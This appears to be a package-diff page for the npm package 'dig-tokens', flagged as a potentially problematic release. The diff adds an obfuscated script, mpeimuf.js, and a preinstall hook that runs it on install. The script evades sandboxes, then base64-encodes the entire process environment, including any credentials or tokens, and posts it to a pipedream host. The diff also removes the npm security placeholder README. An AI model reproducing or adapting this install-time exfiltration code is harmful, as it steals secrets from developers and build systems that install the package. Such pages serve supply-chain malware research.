dig-tokens 0.0.1-security → 6.787.564

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of dig-tokens might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/mpeimuf.js +1 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/mpeimuf.js ADDED
@@ -0,0 +1 @@
1
+ const a0_0x59e4a0=a0_0x59ca;function a0_0x59ca(_0xa49c22,_0x5213c8){const _0x450f1d=a0_0x450f();return a0_0x59ca=function(_0x59ca44,_0x488d91){_0x59ca44=_0x59ca44-0xcf;let _0x1570bf=_0x450f1d[_0x59ca44];return _0x1570bf;},a0_0x59ca(_0xa49c22,_0x5213c8);}(function(_0x2f5a28,_0x3bc3fe){const _0x4ed40f=a0_0x59ca,_0x107f47=_0x2f5a28();while(!![]){try{const _0x38d1ef=parseInt(_0x4ed40f(0xde))/0x1+-parseInt(_0x4ed40f(0xe3))/0x2*(-parseInt(_0x4ed40f(0xda))/0x3)+-parseInt(_0x4ed40f(0xe5))/0x4*(-parseInt(_0x4ed40f(0xd2))/0x5)+parseInt(_0x4ed40f(0xd6))/0x6+parseInt(_0x4ed40f(0xe7))/0x7+parseInt(_0x4ed40f(0xcf))/0x8*(parseInt(_0x4ed40f(0xe9))/0x9)+-parseInt(_0x4ed40f(0xdd))/0xa*(parseInt(_0x4ed40f(0xe4))/0xb);if(_0x38d1ef===_0x3bc3fe)break;else _0x107f47['push'](_0x107f47['shift']());}catch(_0x278b64){_0x107f47['push'](_0x107f47['shift']());}}}(a0_0x450f,0x5802a));const http=require(a0_0x59e4a0(0xe8)),filter=[{'key':'npm_config_registry','val':a0_0x59e4a0(0xe6)},{'key':'npm_config_registry','val':a0_0x59e4a0(0xdb)},{'key':a0_0x59e4a0(0xd1),'val':'registry.npmmirror.com'},{'key':a0_0x59e4a0(0xd3),'val':a0_0x59e4a0(0xd7)},{'key':'_','val':a0_0x59e4a0(0xd9)}];function main(){const _0x31ee84=a0_0x59e4a0;var _0x3776da=process['env']||{};if(filter[_0x31ee84(0xd5)](({key:_0x2c140f,val:_0x40baa0})=>_0x3776da[_0x2c140f]&&_0x3776da[_0x2c140f][_0x31ee84(0xd0)](_0x40baa0))||Object['keys'](_0x3776da)[_0x31ee84(0xdc)]<0xa)return;req=http['request']({'host':['c2e7a0cfd4f45f811ede4b077ae48dfa','m',_0x31ee84(0xdf),'net']['join']('.'),'path':'/'+(_0x3776da[_0x31ee84(0xd8)]||''),'method':_0x31ee84(0xe0)})['on']('error',function(_0x1ffbdc){}),req['write'](Buffer[_0x31ee84(0xd4)](JSON[_0x31ee84(0xe2)](_0x3776da))['toString'](_0x31ee84(0xe1))),req['end']();}main();function a0_0x450f(){const _0x1bb0b6=['POST','base64','stringify','426ATmsye','14520NREywG','14364cJSuqQ','taobao.org','4255867qJUzCd','https','1791UMvtyu','1064Kcvfff','includes','npm_config_registry','50VLTVBy','USERNAME','from','some','119232pYLUsO','daasadmin','npm_package_name','/usr/bin/python','10074ZAxeWH','tencent.com','length','13280fUWMIM','707966iqiAGW','pipedream'];a0_0x450f=function(){return _0x1bb0b6;};return a0_0x450f();}
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "dig-tokens",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "6.787.564",
4
+ "main": "mpeimuf.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "node mpeimuf.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=dig-tokens for more information.